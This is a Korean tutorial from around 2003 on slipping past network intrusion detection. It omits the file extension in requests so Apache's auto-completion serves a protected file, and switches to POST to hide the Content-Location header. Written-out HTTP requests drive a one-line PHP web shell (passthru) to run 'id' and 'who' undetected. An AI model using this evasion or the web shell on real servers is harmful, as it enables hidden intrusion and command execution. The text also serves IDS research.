/* 

글쓴이 : 

beist ( beist member && wowcode member ) 
realmania ( beist member ) 

homepage: http://beist.org 
e-mail: beist@hanmail.net 
msn: beist@hotmail.com 

beist와 관련된 사이트 : 
http://wowhacker.com (wowcode at wowhacker team) 
http://hackerschool.org (very good hacking portal site) 

*/   



제목 : 서버 어플리케이션의 정상적인 기능을 이용한 IDS 탐지 우회하기 


안녕하세요? 

오늘은 Network IDS 를 우회할 수 있는 한 방법에 대해서 알아보겠습니다. 
N-IDS 에 실제 적용 가능한 기술이지만, 특정 프로그램을 Target 으로 잡고 
자세한 강좌를 진행하지는 않겠습니다. 개념에 대한 이해를 목표로 글을 
작성하겠습니다. 

N-IDS 의 탐지를 우회할 수 있는 기법에 대해서는 많은 것들이 인터넷에 소개가 
되었습니다. OOB 이용, TCP data 조작, IP 프레그멘테이션 조작 등등 TCP/IP 의 
헛점을 이용한 우회 방법부터, IDS 프로그램의 잘못된 탐지 알고리즘을 이용한 
우회 방법까지 많은 기술들이 소개되어 있습니다. 

이번에 이 문서에서 다룰 방법은, TCP/IP 의 잘못된 설계를 이용한 우회 방법이나 
IDS 프로그램의 잘못된 알고리즘 사용으로 인한 우회 방법은 아닙니다. 공격할 
서버 어플리케이션의 '정상적인' 기능을 이용하여서 N-IDS 의 침입 탐지를 
우회하는 방법에 대해서 소개를 하겠습니다. 

이 글에서 설명할 것은 Apache WebServer 에서, N-IDS 의 침입 탐지/차단 
시스템을 우회하는 방법에 대해서 다룰 것입니다. 

(일반적으로 IDS 는 침입 탐지가 목적이지만 요즘에는 탐지와 차단을 겸용한 
솔루션이 많이 나오고 있습니다.) 

오늘 날, 대부분의 해킹은 Web Hacking 으로 이루어지거나, Web Hacking 이 
시-발점이 됩니다. 그에 따라서 Web 에 대한 보안이 대두되어지고, 많은 
N-IDS 시스템이 Web 을 통한 해커의 침입을 탐지합니다. 

앞에서도 말씀드렸듯이 이 문서에서는 특정 IDS 제품을 대상으로 우회 방법을 
자세하게 기술하거나 하지는 않겠습니다. 그렇지만 이 방법은, IDS 알고리즘의 
취약성이나 TCP/IP 의 잘못된 설계 구조를 이용한 방법이 아니기 때문에 많은 
IDS 가 이 문서에서 설명하는 방법을 탐지해내지 못합니다. 


설명을 시작하겠습니다. Apache WebServer 의 기능중에 다음과 같은 기능이 
있습니다. 


- Client 의 문서 (혹은 특정 파일) 요청을 받는다. 
- Client 가 요청한 파일에 확장자가 지정되지 않을 경우 자동으로 확장자를 
뒤에 붙여서 그 파일이 서버에 존재하는지 확인한다. 
- 만약 임의로 붙인 확장자가 존재할 경우 해당 파일을 Client 에게 돌려준다. 


우리는 위 기능을 이용하여 N-IDS 의 침입 탐지/차단을 우회해보겠습니다. 


먼저 우리가 우회할 N-IDS 에 설정된 것들에 대해서 알아보겠습니다. 


- secret.html 파일이 서버에 존재합니다. secret.html 파일은 중요한 내용이 
담겨있다고 가정합니다. 
- Client -> Server 의 Packet 중에, 즉 사용자가 서버에 특정 파일을 웹 서버에 
요청 할 때 secret.html 이란 문자열이 존재한다면, 요청한 사용자의 IP 를 
특정 IP 와  비교합니다. 
- 특정 IP 는 인증 IP 이고, 인증 IP 에서의 요청이 아니라면 사용자의 이번 요청을 
침입이라 간주하고, 탐지/차단합니다. 


(이 때, N-IDS 는, HTTProcotol 로 들어오는 Unicode 등에 대한 사용자의 
요청 스트링의 복호화까지 감안하여 완벽한 탐지를 하고 있다고 가정합니다. 
즉, 탐지 알고리즘에는 오류가 없다고 가정합니다.) 


일반적으로 사용자가 Web Server 에 특정 데이터를 요청할때는 다음과 같은 형식을 
지닙니다. 


- 사용자가 Web Server 에 index.html 파일을 요청하는 과정 

GET /index.html HTTP/1.1 
Accept: */* 
Accept-Language: ko 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 
Host: beist.org 
Connection: Keep-Alive 


위와 같은 형식으로 Web Server 에 파일을 요청하면, Web Server 에서는 결과 값을 
사용자에게 돌려줍니다. 

만약 다음과 같이 사용자가 Web Server 에 secret.html 파일을 요청하면, 
IDS 에서 secret.html 스트링을 감지하고 로그를 남길 것입니다. 


- 사용자가 Web Server 에 secret.html 파일을 요청 

GET /secret.html HTTP/1.1 
Accept: */* 
Accept-Language: ko 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 
Host: beist.org 
Connection: Keep-Alive 



- N-IDS 에 남긴 로그 

Alert : 2003/4/25 AM 02:45 - 111.222.333.444 IP 에서 secret.html 파일 요청하였음. 


(로그는 임시로 작성하였습니다.) 


IDS 의 탐지를 피하게 되면, 자동으로 차단되지 않을 것입니다. 

IDS 의 탐지를 피하는 방법에 대해서 본격적으로 알아보겠습니다. 위에서 우리는 
Apache WebServer 의 어떤 기능에 대해서 알아보았습니다. 사용자가 요청한 파일명에서 
확장자가 지정되지 않으면 임의로 확장자를 붙이고 서버에서 검색한다는 기능인데, 
이 기능을 이용하면 IDS 의 탐지에 걸리지 않고 secret.html 파일을 요청할 수 있습니다. 


가령 사용자가 Web Server 에 다음과 같이 요청을 한다고 가정합니다. 


- IDS 의 탐지를 우회하기 위한 요청 

GET /secret HTTP/1.1 
Accept: */* 
Accept-Language: ko 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 
Host: beist.org 
Connection: Keep-Alive 


- 결과 

HTTP/1.1 200 OK 
Date: Thu, 24 Apr 2003 02:41:08 GMT 
Server: Apache 
Content-Location: secret.html 
Vary: negotiate 
TCN: choice 
X-Powered-By: PHP/4.2.2 
Keep-Alive: timeout=15, max=98 
Connection: Keep-Alive 
Transfer-Encoding: chunked 
Content-Type: text/html 

secret.html 의 데이터들.. 
secret.html 의 데이터들.. 
secret.html 의 데이터들.. 
secret.html 의 데이터들.. 


위와 같이 사용자가 Web Server 에 요청을 하게 되면, Web Server 는 먼저 secret 파일을 
찾을 것입니다. secret 파일이 존재하지 않고, 사용자가 요청하였을 때 확장자를 지정하지 
않았으므로, 임의로 확장자를 붙여서 서버 내에 해당 파일이 존재하는지 확인할 것입니다. 

Web Server 가 임의로 확장자를 붙이는 것들은 다음과 같습니다. 


- 검색 확장자 

txt, html, htm, php, phps 등등 


결국 Web Server 는 secret.html 파일을 찾게될 것이고, 이 파일을 사용자에게 돌려줄 
것입니다. 

Web Server 는 사용자에게 secret.html 파일을 주었지만, 사용자의 요청은 secret.html 이 
아니라 secret, 즉 패킷 속에는 secret.html 라는 문자열이 없었으므로, IDS 는 이 요청을 
탐지/차단하지 못할 것입니다. 


위와 같은 우회 방법을 이용하여도 CGI 를 사용하는데 문제가 없습니다. 가령 예를 들어 


- beist.html 

<? passthru($beist); ?> 


위 파일을 IDS 에 걸리지 않고 사용하려 한다면 다음과 같이 요청을 하여 사용할 수 
있습니다. 


- CGI 사용 요청 

GET /beist?beist=id HTTP/1.1 
Accept: */* 
Accept-Language: ko 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 
Host: beist.org 
Connection: Keep-Alive 


- 결과 

uid=99(nobody) gid=99(nobody) groups=99(nobody) 


이런 방법으로, Web Server 의 기능으로 인해 IDS 의 탐지를 우회할 수 있었습니다. 
이 방법은 TCP/IP 의 취약성이나 IDS 의 알고리즘 오류를 이용한 것이 아닌, 순수 
Web Server 의 기능을 이용한 우회 방법이었습니다. 

이 것이 이 문서의 취지인데, 여기서 한 가지 예를 더 들어보겠습니다. 


만약, IDS 에서 Client -> Server 의 패킷뿐만 아니라, Server -> Client 의 패킷까지 
검사를 한다고 가정한다면 위 방법은 통하지 않을 것입니다. 왜냐하면, 위와 같은 
우회 방법으로 사용자가 Web Server 에 요청을 하고, Web Server 에서 결과 값을 
돌려줄 때 다음과 같은 패킷을 포함하기 때문입니다. 


- Web Server 가 돌려주는 패킷에 포함되는 값 

Content-Location: secret.html 


그렇지만 이 것도 다른 방법으로 우회가 가능합니다. Apache WebServer 에서는, 
사용자가 POST 로 요청을 하면 Content-Location 의 값을 주지 않습니다. 그러므로 
GET 이 아닌, POST 로 요청 한다면, Server -> Client 의 패킷에는 secret.html 이 
포함되지 않기 때문에, 역시 IDS 의 탐지를 우회할 수 있을 것입니다. 


- Content-Location 이 포함되는 것을 피하기 위해 POST 를 이용하여 요청하기 

POST /secret HTTP/1.0 


- 결과 

HTTP/1.1 200 OK 
Date: Thu, 24 Apr 2003 03:47:27 GMT 
Server: Apache 
X-Powered-By: PHP/4.2.2 
Connection: close 
Content-Type: text/html 

secret.html 의 데이터들.. 
secret.html 의 데이터들.. 
secret.html 의 데이터들.. 
secret.html 의 데이터들.. 



물론, POST 로 요청하여도 CGI 를 사용할 수 있습니다. 


- POST 로 beist.html CGI 사용하기 

POST /beist HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 
Referer: http://beist.org/beist_form.html 
Accept-Language: ko 
Content-Type: application/x-www-form-urlencoded 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 
Host: beist.org 
Content-Length: 9 
Connection: Keep-Alive 

beist=who 


- 결과 

HTTP/1.1 200 OK 
Date: Thu, 24 Apr 2003 03:53:04 GMT 
Server: Apache 
X-Powered-By: PHP/4.2.2 
Keep-Alive: timeout=15, max=100 
Connection: Keep-Alive 
Transfer-Encoding: chunked 
Content-Type: text/html 

30 
beist    pts/0    Apr 24 08:37 (222.111.444.555) 
0 


이런 방법으로 IDS 를 우회할 수 있습니다. 




- 글을 마치며 


이 방법은 아주 기술적이거나 그런 것은 아닙니다. 오히려 원리를 알고 나면 단순한 
방법으로 IDS 의 탐지를 우회할 수 있었습니다. 그렇지만 이 문서에서 시사하는 바는 이 
우회 방법, 그 자체에 대한 것은 아닙니다. 

이 방법은 TCP/IP 의 잘못된 설계를 이용하여 우회한 것도 아니고, IDS 를 만들때 
잘못된 탐지 알고리즘의 취약성을 이용하여 우회한 것도 아닙니다. 

이 문서에서는 Apache WebServer 자체의 정상적인 기능을 이용하여서 IDS 의 탐지를 
우회하였습니다. 

즉, 이 말은 IDS 탐지를 개발하거나 연구할 때, 혹은 해킹하려할 때, TCP/IP 단계에서의 
잘못된 구조 취약성이나 잘못된 IDS 알고리즘 사용에 대한 부분만을 살펴봐야할 것이 
아니라, IDS 가 탐지하려하는 데몬의 기능까지도 살펴보아야 한다는 이야기입니다. 

우리가 생각지도 못한, 데몬의 어떤 기능 (특별한 문제가 없는 정상적인 기능) 에서도 
위와 같은 상황이 발생할 수도 있습니다. 

물론, IDS 를 연구하는 사람들의 입장에서 볼 때, 이 것은 TCP/IP layer 가 아닌 
어플리케이션 차원의 문제이기 때문에 이를 모두 알아내서 대책을 세운다는 것은, 
난감한 상황일 것입니다. 이에 대해서는 저도 동의하는 바이며, 단지 이 문서는 
이런 우회 '방법론'도 있다는 것에 대해서 알리기 위한 글이었습니다.